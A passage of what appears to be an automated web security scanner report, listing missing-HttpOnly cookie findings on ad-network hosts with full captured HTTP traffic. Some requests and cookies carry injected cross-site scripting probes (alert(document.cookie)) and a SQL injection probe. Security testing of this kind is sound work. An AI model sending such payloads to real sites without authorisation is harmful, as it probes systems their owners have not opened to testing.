User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: uid=6731d4ad-7dae-4402-b507-a0bc233d79fb; udc=*1AjVT%2bgfw%2f8PyH2Istroh8g%3d%3d; uic=*1pOlwoshvAW2x3Oz%2bjok0cvVUTldU9thEXDVJHERJCsS8Qa8h95CnNUGIZvfT3E7MxvviQAdwbClCyEye0669isBI09H1R%2bKRO%2fltWpPRjN8%3d; evt=*1y97%2bNEPoN61o4EOCN%2fR2J9xVlHZMgVk%2b%2b2CwFGGZfIU%3d; dis=*1qWp1fsD%2bNdFnAtZ8%2baXsozp2l%2bVc4bwCpvGo36v6yzYl0vr%2b2rjd5s8HTnWLQ9vMdXMCedmlDMU1pVu7re3OqNSH03%2b%2fM819k1%2fHITjOJ99Qw4xwyEiIgha04DWLoK6z%2ftKYTIM%2bWvQpq6GH7Cf6THfb8s6N7d8wMlE1BAjK%2bDHApUIrLHRIWZaa1LvF56sc8LiTQybietPPncAzstNhBe%2baDkL8RY%2bTFbyxwc4wWOtAD8BXpV3Cz%2fiiH%2bVSWcx0rMIjfsHkOqahM925DOtINv%2b5GBrED6nMhkSLKihoDycCzgwK0V924PtbaS64eEp7pATGcjXGxFLRtaKsTJllUarZKLj%2blLzkQoSSdQl2IgEDKA2%2fEGzXqNG5Iw%2fnmBmo6CrXMAegC0CK3gdYN%2b9DnZN2Cfy1%2b4%2blkWJ4jnK5p6TQ36wYJrd9vjipwogdRUCTqKEM3BvjqUQfJ0nea7i6vfabzsxKam14f%2fi5q8J2VF2V6DewZNzR%2f5365qR2sDhJWkbOphSWIYmULMBJPmZneFkaco3LrTUxUAqI3%2brS7h8bDHumnJE%2fp2b6uo%2b9XJRy%2fhw%2bC7HcUnCJHPYM0Scri9FFUNs5fbiASA4wjgT53CRkUy0COj5OZSzb96RLeBPIAU8O5IHm0fDHfL3qnOXeEY19u0QsnKNz0kXGI9w9M0Q%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 04 Sep 2011 03:56:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: lbdis=; domain=.criteo.com; expires=Sat, 03-Sep-2011 03:56:54 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 04-Oct-2011 03:56:54 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 04-Oct-2011 03:56:54 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Set-Cookie: udc=*1ZF0W7Qh%2bkwR8H0jq3%2blTcFxpLyq4t52c%2f4ZgAzCu7Lo7oFeIs3JB5PilT4h9Nnd2Ed16pEHbTzLtM%2fX9HB5hnQ%3d%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:56:54 GMT; path=/
Set-Cookie: udi=*1ST63u%2b2MeboKImU0y8lpwQ%3d%3d; domain=.criteo.com; expires=Mon, 05-Sep-2011 03:56:54 GMT; path=/
Content-Length: 5222

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...

16.87. http://cdn4.specificclick.net/optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn4.specificclick.net
Path:   /optout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.php HTTP/1.1
Host: cdn4.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=m0NgwKlU3fGJkA

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 10:59:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=deleted; expires=Sat, 04-Sep-2010 10:59:29 GMT; path=/
Location: http://notrack.specificclick.net/CookieCheck.php?optThis=1&cdn4=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.88. http://clk.atdmt.com/MRT/go/343014976/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/343014976/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/343014976/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.microsoft.com/windows/new-pc/detail.aspx?pc=samsung-series-9
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:6be1/2618b:f7d9/2b514; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:a3fb237/2618b/109b4b10/6be1/4e62faef:dac239a/2b514/1471fe40/f7d9/4e62faef; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close


16.89. http://clk.atdmt.com/goiframe/171946551/278612752/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/171946551/278612752/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/171946551/278612752/direct HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.yahoo.com
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:f7d9/2b514:6be1/2618b; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:dac239a/2b514/1471fe40/f7d9/4e62e827:a3fb237/2618b/109b4b10/6be1/4e62faef; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close


16.90. http://clk.fetchback.com/serve/fb/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315109617_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Set-Cookie: cre=1_1315109617_34021:68285:1:12332:12332_34024:68283:2:12566:12658_34024:68292:2:131454:131536_34023:68293:1:132167:132167; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Set-Cookie: clk=1_1315109617; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 04:13:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 04:13:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://default.com
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif


16.91. http://cms.ad.yieldmanager.net/v1/cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms HTTP/1.1
Host: cms.ad.yieldmanager.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 04:13:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=caielnp765uni&t=1315109618;path=/; expires=
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 0


16.92. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030? HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c5db95c36674fba9b15e93c0a5317c9e; expires=Mon, 03-Sep-2012 03:27:16 GMT; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

16.93. http://d.tradex.openx.com/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ck.php HTTP/1.1
Host: d.tradex.openx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c5db95c36674fba9b15e93c0a5317c9e%5D%5D%3E%3E; expires=Mon, 03-Sep-2012 04:13:50 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.94. http://d.tradex.openx.com/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=1929&campaignid=632&zoneid=5730&cb=04709db74d&r_id=edb2a1dc7ff395103b661a785688d648&r_ts=lqz86w HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:28:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 03-Sep-2012 03:28:41 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.95. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7/jsc/1302/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:45 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2185459
Expires: Thu, 29 Sep 2011 11:19:04 GMT
Date: Sun, 04 Sep 2011 04:14:45 GMT
Connection: close



16.96. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7/jsc/933/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7/jsc/933/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:52 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=912762
Expires: Wed, 14 Sep 2011 17:47:34 GMT
Date: Sun, 04 Sep 2011 04:14:52 GMT
Connection: close



16.97. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R53_7_5/jsc/767/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R53_7_5/jsc/767/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851,234927,234926,234925,199879:933,196008:767,218791:0,0|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:2,1#0,24:0,1#0,24]]>>:0,1#0,24:0,0#0,0;expires=Tue, 04 Oct 2011 04:14:53 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1837600
Expires: Sun, 25 Sep 2011 10:41:33 GMT
Date: Sun, 04 Sep 2011 04:14:53 GMT
Connection: close



16.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=9&q=&$=&s=0&z=0.6926130542997271 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; aps=1; FFMCap=2457900B1185,234056:933,196008|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFad=0:0:0:0:0:0:0; FFcat=767,4,41:933,56,15:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'$767:e210c;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,9:767,4,9:767,4,41:933,56,15:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:1:0:0:0:0:0'%20and%201%3d1--%20:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=147
Expires: Sun, 04 Sep 2011 02:46:06 GMT
Date: Sun, 04 Sep 2011 02:43:39 GMT
Content-Length: 5163
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='e210c';va
...[SNIP]...

16.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=5&d=9&q=&$=&s=0&z=0.45356627337666533 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:0:47:1:1:0:1; aps=2; FFMCap=2457960B933,196008|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457960B933,196008:826,114248|0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:36:30 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:0:0:0:47:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=25
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:36:30 GMT
Content-Length: 4307
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCu
...[SNIP]...

16.100. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d2/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d2.zedo.com/jsc/d2/ff2.html?n=767;c=33/1;d=40;w=728;h=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; FFMCap=2457900B1185,234056:933,196008|0,1#0,24:0,1#0,24; aps=2; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFad=0:1:0:0:0:0:0:0:0:0; FFcat=767,4,94:933,56,15:826,471,9:767,4,9:767,4,41:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Mon, 03 Sep 2012 02:44:05 GMT;domain=.zedo.com;path=/;
ETag: "9e267a-5d7-4aa4dd4309500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326565
Expires: Wed, 07 Sep 2011 21:26:50 GMT
Date: Sun, 04 Sep 2011 02:44:05 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

16.101. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=202;s=32;d=9;w=300;h=250;l=[INSERT_CLICK_TRACKER_MACRO]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
